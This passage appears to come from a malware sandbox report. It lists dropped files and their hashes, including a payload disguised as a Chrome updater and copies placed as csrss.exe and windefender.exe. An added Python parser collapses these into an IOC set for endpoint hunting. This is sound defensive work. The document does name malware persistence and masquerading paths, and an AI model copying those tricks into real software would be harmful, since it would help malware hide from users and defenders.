| SHA512 | 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
| SHA512 | 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474 |
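Added example, not part of the sandbox report above and not the sandbox vendor's own tooling: a small parser that turns a dropped-files and memory-dump listing like the one above into a deduplicated IOC set. The sample text is a constructed excerpt copied from entries on this page, with some hash rows left out for brevity; the function and variable names are assumptions of my own. The point it makes is that the same SHA256 is written to several paths (the Temp-stage 3eef203fb515bda85f514e168abb5973.exe and its copy at C:\Windows\rss\csrss.exe; updChrome.exe and C:\Program Files\Google\Chrome\updater.exe), so the long path list collapses to a short hash list, and the memory-dump lines expose image ranges that were dumped from more than one PID.

```python
"""Parse a Triage-style dropped-files / memory-dump listing into IOCs.

Added example; not part of the original report. SAMPLE is a constructed
excerpt copied from entries on the report page (some hash rows omitted).
"""
import re
from collections import defaultdict

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
memory/2636-260-0x00007FF774FE0000-0x00007FF7767A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
C:\Program Files\Google\Chrome\updater.exe
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
C:\Windows\rss\csrss.exe
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
memory/1284-288-0x00007FF774FE0000-0x00007FF7767A9000-memory.dmp
memory/2940-294-0x0000000004D70000-0x0000000004D85000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
C:\Windows\windefender.exe
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
"""

# One "| ALGO | hex |" row as printed in the report.
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")
# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
# A drive-letter Windows path starts a new dropped-file record.
PATH_LINE = re.compile(r"^[A-Za-z]:\\")


def parse_listing(text):
    """Return (files, dumps). Each drop event stays a separate record so
    the order of events from the report is preserved."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_LINE.match(line)
        if m:
            start, end = int(m[3], 16), int(m[4], 16)
            dumps.append({"pid": int(m[1]), "seq": int(m[2]),
                          "start": start, "end": end, "size": end - start})
            continue
        m = HASH_ROW.match(line)
        if m and current is not None:
            current[m[1].lower()] = m[2]
            continue
        if PATH_LINE.match(line):
            current = {"path": line}
            files.append(current)
        # Anything else (section headers, signature rows) is ignored.
    return files, dumps


def unique_by_sha256(files):
    """Collapse repeated drop events: SHA256 -> sorted list of paths."""
    by_hash = defaultdict(set)
    for f in files:
        if "sha256" in f:
            by_hash[f["sha256"]].add(f["path"])
    return {h: sorted(p) for h, p in by_hash.items()}


def aliased_paths(files):
    """Hashes written to more than one path: the self-copy / persistence step."""
    return {h: p for h, p in unique_by_sha256(files).items() if len(p) > 1}


def shared_image_ranges(dumps):
    """(start, end) ranges that were dumped from more than one PID."""
    seen = defaultdict(set)
    for d in dumps:
        seen[(d["start"], d["end"])].add(d["pid"])
    return {r: sorted(p) for r, p in seen.items() if len(p) > 1}


if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE)
    for h, paths in aliased_paths(files).items():
        print(h, "->", paths)
    for (s, e), pids in shared_image_ranges(dumps).items():
        print(f"0x{s:X}-0x{e:X} ({e - s:#x} bytes) dumped from PIDs {pids}")
```

Run against the full listing on this page, the deduplicated hash set plus the out-of-Temp write targets (C:\Windows\rss\csrss.exe, C:\Windows\windefender.exe, C:\Program Files\Google\Chrome\updater.exe, and the rewritten C:\Windows\System32\drivers\etc\hosts) is what to push into an endpoint hunt; the repeated Temp entries add no new indicators.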